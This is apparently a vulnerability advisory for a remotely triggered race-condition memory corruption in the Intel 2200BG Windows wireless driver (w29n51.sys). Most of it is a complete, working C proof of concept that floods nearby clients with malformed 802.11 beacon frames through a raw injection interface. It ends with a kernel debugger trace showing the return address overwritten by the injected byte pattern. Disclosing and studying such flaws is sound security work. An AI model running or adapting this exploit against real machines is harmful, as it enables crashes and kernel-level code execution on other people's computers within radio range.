The Windows driver for the Intel 2200BG wireless card (w29n51.sys) suffers from a remotely triggerable race-condition memory corruption vulnerability. Proof of concept code included.
52fece9a4bfaaa83265054f29f2318eb916e0cfd1bd0d159da6c9810cca9d699
Title: Intel 2200BG 802.11 Beacon frame Kernel Memory Corruption
Description: The Intel wireless Mini PCI driver shipped with Intel
2200BG cards (w29n51.sys) is vulnerable to a remote race-condition memory
corruption flaw that is reached with spoofed beacon frames.
Malformed beacon frames can be used to corrupt internal kernel
structures, leading to arbitrary code execution in kernel context.
The vulnerability is triggered by flooding the card with many malformed
beacon frames; the PoC below injects them in a tight loop through a raw
802.11 interface (`ath0raw`) on a second, attacker-controlled radio.
Frame data is copied over internal kernel structures, so subsequent
memory operations use attacker-controlled values -- including the saved
return address (EIP), as the overwritten return address 0x5b5a5958 in the
stack trace below shows.
This vulnerability was found in Intel 2200 driver version 9.0.3.9 (dated 09/12/2005). Driver file names and hashes follow.
Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd
Author: Breno Silva Pinto (Open Communications Security /
bsilva[at]sekure[dot]org) - Initial discovery and PoC
Johnny Cache - helped develop a working exploit
Proof of Concept (Linux; the sending interface must accept raw 802.11 frames for injection, and opening the PF_PACKET socket requires root or CAP_NET_RAW):
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <linux/wireless.h>
// Change BSSID and SRC MAC ADDR to AP you are associated
char beacon[] = { 0x80, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff,
0x00, 0x18, 0x39, 0xe2, 0x12, 0xda,0x00, 0x18, 0x39, 0xe2, 0x12, 0xda,
0x30, 0x2f, 0x84, 0x18, 0xa9, 0xf7, 0x00, 0x00, 0x00, 0x00, 0x64, 0x00,
0x01, 0x04, 0x00, 0xff, 0x53, 0x41, 0x55, 0x4e, 0x41, 0x01, 0x08, 0x82,
0x84, 0x8b,0x96, 0x24, 0x30, 0x48, 0x6c, 0x04, 0x01, 0x08, 0x05, 0x04,
0x00, 0x01, 0x00, 0x00, 0x2a, 0x01,0x04, 0x2f, 0x01, 0x04, 0x32, 0x04,
0x0c, 0x12, 0x18, 0x60, 0xdd, 0x06, 0x00, 0x10, 0x18, 0x02,0x00, 0xf4,
0x08, 0xc1, 0xca, 0x93 };
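/*
 * Layout of the frame the PoC transmits.  beacon[] is a plain 802.11
 * beacon: 24-byte management header, 8-byte timestamp, 2-byte beacon
 * interval, 2-byte capability field, then information elements, so byte 36
 * is the SSID element ID (0x00) and byte 37 its length byte.
 */
enum {
    SSID_LEN_OFF  = 37,    /* SSID length byte; it and the 32 bytes after it */
    SSID_FILL_LEN = 33,    /* (bytes 37..69) are set to SSID_FILL             */
    SSID_FILL     = 0x44,
    SEQ_OFF       = 70,    /* incrementing filler occupies bytes 70..216      */
    SEQ_LEN       = 147,
    SEQ_START     = 0x44,  /* values run 0x44..0xd6, so no wrap-around occurs */
    BURST         = 5,     /* sendto() calls per burst, as in the original    */
    /*
     * Bytes actually transmitted.  The original passed strlen(beacon)+147 to
     * sendto(); beacon[2] (duration field) is 0x00, so strlen(beacon) is 2,
     * not sizeof(beacon), and 149 bytes went on the wire -- the filler at
     * bytes 149..216 is built but never sent.  Kept exactly, because this is
     * the frame that produced the crash dump below; use sizeof(beacon) here
     * if you want the "intended" 233-byte frame instead.
     */
    FRAME_LEN     = 2 + SEQ_LEN
};

/*
 * Build the malformed beacon in frame[frame_sz]: zero the buffer, copy the
 * template, set the SSID length byte and the 32 bytes after it to SSID_FILL,
 * then write the incrementing filler at SEQ_OFF.  Returns 0, or -1 when the
 * buffer is too small for the filler or for the template.
 */
static int build_frame(unsigned char *frame, size_t frame_sz,
                       const char *tmpl, size_t tmpl_len)
{
    if (frame_sz < (size_t)(SEQ_OFF + SEQ_LEN) || tmpl_len > frame_sz)
        return -1;

    memset(frame, 0, frame_sz);
    memcpy(frame, tmpl, tmpl_len);
    memset(frame + SSID_LEN_OFF, SSID_FILL, SSID_FILL_LEN);
    for (int j = 0; j < SEQ_LEN; j++)
        frame[SEQ_OFF + j] = (unsigned char)(SEQ_START + j);
    return 0;
}

/*
 * Open a raw PF_PACKET socket (needs CAP_NET_RAW) bound to ifname.
 * Returns the socket descriptor, or -1 after printing the failing call.
 */
static int open_raw_socket(const char *ifname)
{
    struct ifreq ifr;
    struct sockaddr_ll addr;
    int ctl, s;

    memset(&ifr, 0, sizeof ifr);
    if (snprintf(ifr.ifr_name, IFNAMSIZ, "%s", ifname) >= IFNAMSIZ) {
        fprintf(stderr, "interface name too long: %s\n", ifname);
        return -1;
    }

    /* Any socket works for the ioctl; close it once the index is known
     * (the original reused the variable and leaked this descriptor; the
     * SIOCGIFHWADDR result it also fetched was never used). */
    ctl = socket(PF_INET, SOCK_DGRAM, 0);
    if (ctl < 0) {
        perror("socket(PF_INET)");
        return -1;
    }
    if (ioctl(ctl, SIOCGIFINDEX, &ifr) < 0) {
        perror("SIOCGIFINDEX");
        close(ctl);
        return -1;
    }
    close(ctl);

    s = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (s < 0) {
        perror("socket(PF_PACKET)");
        return -1;
    }

    memset(&addr, 0, sizeof addr);
    addr.sll_family  = AF_PACKET;
    addr.sll_ifindex = ifr.ifr_ifindex;
    if (bind(s, (struct sockaddr *)&addr, sizeof addr) < 0) {
        perror("bind");
        close(s);
        return -1;
    }
    return s;
}

/*
 * usage: poc [iface] [nframes]
 *   iface    injection interface, default "ath0raw"
 *   nframes  stop after this many frames; 0 or absent floods until killed
 * Returns 0 on completion, 1 on bad arguments or a socket/send failure.
 * The frame is built once; every transmitted copy is identical, as in the
 * original (its "random" filler was reset to the same seed on every pass).
 */
int main(int argc, char **argv)
{
    const char *ifname = argc > 1 ? argv[1] : "ath0raw";
    unsigned long limit = 0;
    unsigned char frame[700 + sizeof(beacon)];
    int s;

    if (argc > 2) {
        char *end;
        limit = strtoul(argv[2], &end, 10);
        if (argv[2][0] == '\0' || *end != '\0') {
            fprintf(stderr, "usage: %s [iface] [nframes]\n", argv[0]);
            return 1;
        }
    }

    if (build_frame(frame, sizeof frame, beacon, sizeof(beacon)) < 0) {
        fprintf(stderr, "frame buffer too small\n");
        return 1;
    }

    s = open_raw_socket(ifname);
    if (s < 0)
        return 1;

    for (unsigned long sent = 0; limit == 0 || sent < limit; ) {
        for (int k = 0; k < BURST && (limit == 0 || sent < limit); k++, sent++) {
            /* Socket is bound to the interface, so no destination is needed. */
            ssize_t n = sendto(s, frame, FRAME_LEN, 0, NULL, 0);
            if (n < 0) {
                /* Abort rather than spin forever on a dead interface. */
                perror("sendto");
                close(s);
                return 1;
            }
            printf("Sent %zd\n", n);
        }
    }

    close(s);
    return 0;
}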
Debugging Information (WinDbg kernel session on the victim machine):
BugCheck D1, {402, 2, 0, f6806422}   (0xD1 = DRIVER_IRQL_NOT_LESS_OR_EQUAL: read of address 0x402 at IRQL 2 (DISPATCH_LEVEL) by the instruction at f6806422, i.e. w29n51+0x4e422; the fault is hit inside the driver function whose return address is already corrupted -- see the trace below)
*** ERROR: Module load completed but symbols could not be loaded for
w29n51.sys
Probably caused by : w29n51.sys ( w29n51+4e422 )
Followup: MachineOwner
---------
kd> kv
ChildEBP RetAddr Args to Child
f7a92e68 f6806422 badb0d00 ffffffd2 00000000 nt!KiTrap0E+0x233 (FPO: [0,0]
TrapFrame @ f7a92e68)
WARNING: Stack unwind information not available. Following frames may be
wrong.
f7a92f24 5b5a5958 00000378 ffffffd2 015dcf64 w29n51+0x4e422
f7a92f4c f67f56b5 8659feb0 01010077 00000000 0x5b5a5958
f7a92f64 f67f2f09 8659f000 f7a92f94 f67de759 w29n51+0x3d6b5
f7a92f70 f67de759 8659f000 4001000d 4001000d w29n51+0x3af09
f7a92f94 f67cf873 86dc8568 86dc6888 00000000 w29n51+0x26759
f7a92fa8 f67b938c 86dc6888 86bd1000 f7a92fd0 w29n51+0x17873
f7a92fb8 f74aaf09 86bd1000 448a47c0 00000001 w29n51+0x138c
f7a92fd0 804dbbd4 86dc8580 86dc856c 00000000 NDIS!ndisMDpcX+0x21 (FPO:
[Non-Fpo])
f7a92ff4 804db89e f1751d54 00000000 00000000 nt!KiRetireDpcList+0x46 (FPO:
[0,0,0])
f7a92ff8 f1751d54 00000000 00000000 00000000 nt!KiDispatchInterrupt+0x2a
(FPO: [Uses EBP] [0,0,1])
804db89e 00000000 00000009 bb835675 00000128 0xf1751d54
The saved return address of the w29n51+0x4e422 frame was overwritten with 0x5b5a5958 -- in little-endian memory order the bytes 0x58 0x59 0x5a 0x5b, four consecutive values of the incrementing filler the PoC writes from frame offset 70 (0x44 + 20 = 0x58, so PoC frame offsets 90-93). That the overwritten value matches the injected pattern is what shows the return address is attacker-controlled.